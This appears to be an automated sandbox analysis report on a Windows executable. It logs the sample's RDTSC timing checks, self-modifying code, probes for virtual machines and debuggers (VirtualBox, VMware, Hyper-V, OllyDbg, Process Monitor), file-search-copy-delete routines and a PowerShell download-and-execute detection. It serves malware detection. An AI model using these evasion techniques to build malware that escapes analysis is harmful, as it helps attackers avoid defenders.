                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB7B0 second address: 5BB7B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BBF22 second address: 5BBF32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BBF32 second address: 5BBF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC6A2 second address: 5BC6AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC6AC second address: 5BC6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC6B0 second address: 5BC6BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC6BF second address: 5BC6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC6C3 second address: 5BC6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC6C7 second address: 5BC6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5B4C774D8Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C1EBC second address: 5C1ECC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5B4D24B716h 0x00000008 ja 00007F5B4D24B716h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C35D6 second address: 5C35FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D97h 0x00000007 push esi 0x00000008 jmp 00007F5B4C774D8Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C77A8 second address: 5C77B7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5B4D24B718h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C7347 second address: 5C734B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C74F3 second address: 5C74F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9F41 second address: 5D9F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9F47 second address: 5D9F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DBB61 second address: 5DBB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E81A9 second address: 5E81BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B71Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E802C second address: 5E8030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8030 second address: 5E8036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FBFC4 second address: 4FBFF3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5B4C774D8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F5B4C774D94h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FBFF3 second address: 4FBFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FBFF9 second address: 4FC00D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F5B4C774D86h 0x0000000e ja 00007F5B4C774D86h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F122D second address: 5F1245 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 ja 00007F5B4D24B716h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F5B4D24B71Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1245 second address: 5F124B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F13A5 second address: 5F13AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5B4D24B716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F13AF second address: 5F13B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F13B3 second address: 5F13C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5B4D24B716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F180E second address: 5F181E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5B4C774D86h 0x00000008 jo 00007F5B4C774D86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F19B8 second address: 5F19CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F5B4D24B716h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1B47 second address: 5F1B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007F5B4C774D99h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1C97 second address: 5F1CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4D24B71Eh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F5B4D24B716h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1CB4 second address: 5F1CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F567B second address: 5F5695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4D24B726h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5695 second address: 5F56A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5B4C774D86h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F51E7 second address: 5F51EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6043F2 second address: 6043F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6043F7 second address: 604432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4D24B727h 0x00000009 jg 00007F5B4D24B716h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5B4D24B727h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE7B3 second address: 5FE7BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61128E second address: 611294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611294 second address: 611298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620CF5 second address: 620CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620E50 second address: 620E55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620E55 second address: 620E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6212AC second address: 6212BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F5B4C774D86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6212BC second address: 6212C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621595 second address: 6215C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5B4C774D8Eh 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 js 00007F5B4C774D86h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6219C2 second address: 6219C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625F04 second address: 625F09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625F79 second address: 625F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F5B4D24B716h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6264E9 second address: 6264EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6264EE second address: 6264FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F5B4D24B716h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6264FF second address: 626503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626503 second address: 62650C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62650C second address: 626571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D92h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F5B4C774D88h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 jmp 00007F5B4C774D8Ch 0x0000002b push dword ptr [ebp+122D3270h] 0x00000031 mov edx, ecx 0x00000033 push 8306E6A5h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F5B4C774D95h 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628F7A second address: 628F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628F80 second address: 628FA2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5B4C774D96h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628FA2 second address: 628FC8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5B4D24B729h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628FC8 second address: 628FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628FD0 second address: 628FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628FDB second address: 628FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62B019 second address: 62B01D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0276 second address: 4FF02B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5998h 0x00000007 mov ah, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e call 00007F5B4C774D99h 0x00000013 push ecx 0x00000014 pop edi 0x00000015 pop ecx 0x00000016 mov bl, DAh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5B4C774D8Bh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0377 second address: 4FF039C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5B4D24B71Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF039C second address: 4FF03A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03A2 second address: 4FF03A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03A6 second address: 4FF03B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop ebx 0x0000000f mov cl, 95h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03B8 second address: 4FF0402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, cx 0x00000010 pushfd 0x00000011 jmp 00007F5B4D24B726h 0x00000016 xor si, 6088h 0x0000001b jmp 00007F5B4D24B71Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3918E1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 38F5E2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 55150B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5CE55C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00144910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0013DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0013E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0013ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00144570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0013DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0013BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013F68A FindFirstFileA,0_2_0013F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0013F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00143EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00143EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00131160 GetSystemInfo,ExitProcess,0_2_00131160
                Source: file.exe, file.exe, 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware`
                Source: file.exe, 00000000.00000002.2066181737.0000000001089000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2066181737.000000000107A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2066181737.0000000001053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13593
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13596
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13647
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13607
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13615
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001345C0 VirtualProtect ?,00000004,00000100,000000000_2_001345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00149860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00149860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00149750 mov eax, dword ptr fs:[00000030h]0_2_00149750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00147850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00147850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1520, type: MEMORYSTR
                Searches for specific processes (likely to inject)
